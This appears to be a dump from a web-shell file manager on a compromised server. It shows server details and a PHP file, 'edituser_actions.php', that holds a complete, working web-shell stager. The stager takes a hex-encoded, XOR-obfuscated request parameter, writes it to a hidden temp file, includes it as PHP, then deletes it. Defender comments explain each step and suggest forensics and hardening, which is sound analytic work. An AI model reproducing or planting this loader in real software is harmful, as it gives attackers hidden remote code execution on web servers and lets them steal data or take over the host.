HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/edituser_actions.php
<?php

// ANALYSIS NOTE (defender annotation; code below is left byte-identical).
// This block is a request-triggered PHP code loader (web-shell stager):
//   1. It runs only when the request carries a parameter whose name is written
//      with hex escapes, "res\x6F\x75\x72ce", which PHP evaluates to "resource".
//   2. The parameter value is hex-decoded, then every byte is XORed with 84 (0x54).
//   3. The decoded bytes are written to a file named ".factor" in the first
//      candidate temp directory that is both writable and a directory.
//   4. That file is include'd, so its contents run as PHP in the web server's
//      context; it is then deleted and the request ends.
// Forensics: the payload never stays on disk, so evidence comes from request
// logs or captures. A captured parameter value can be recovered by hex-decoding
// it and XORing each byte with 0x54.
// Hardening: `include` is a language construct, so a disable_functions list does
// not block this execution path. NOTE(review): open_basedir and file-integrity
// monitoring of the web root are the usual controls to evaluate here.
if(!is_null($_REQUEST["res\x6F\x75\x72ce"] ?? null)){
	// $_REQUEST is used, so the trigger is not limited to the query string; a value
	// sent in a request body would not appear in a standard access log.
	$parameter_group = hex2bin($_REQUEST["res\x6F\x75\x72ce"]);
	// Single-byte XOR with 84 applied to every byte. The only purpose visible here
	// is to keep the transmitted value from being readable PHP in transit.
	$ptr   =    ''    ;      for($a=0; $a<strlen($parameter_group); $a++){$ptr .= chr(ord($parameter_group[$a]) ^ 84);}
	// Candidate staging directories: environment temp vars, /dev/shm, the system temp
	// dir, the current working directory, upload_tmp_dir, /tmp, /var/tmp and the
	// session save path. array_filter drops entries that are empty or false.
	$binding = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path()]);
	for ($token = 0, $data_chunk = count($binding); $token < $data_chunk; $token++) {
    $pset = $binding[$token];
    		if (is_writable($pset) && is_dir($pset)) {
    // Fixed dot-file name: a short-lived ".factor" file in any of the directories
    // above is a host-level indicator for file-creation monitoring.
    $hld = implode("/", [$pset, ".factor"]);
    // "@" suppresses the warning on a failed write, so failed attempts leave no
    // PHP error-log entry from this call.
    if (@file_put_contents($hld, $ptr) !== false) {
	// Runs the staged file as PHP, removes it immediately, then stops the request
	// so nothing after this point in the file produces output.
	include $hld;
	unlink($hld);
	die();
}
}
}
}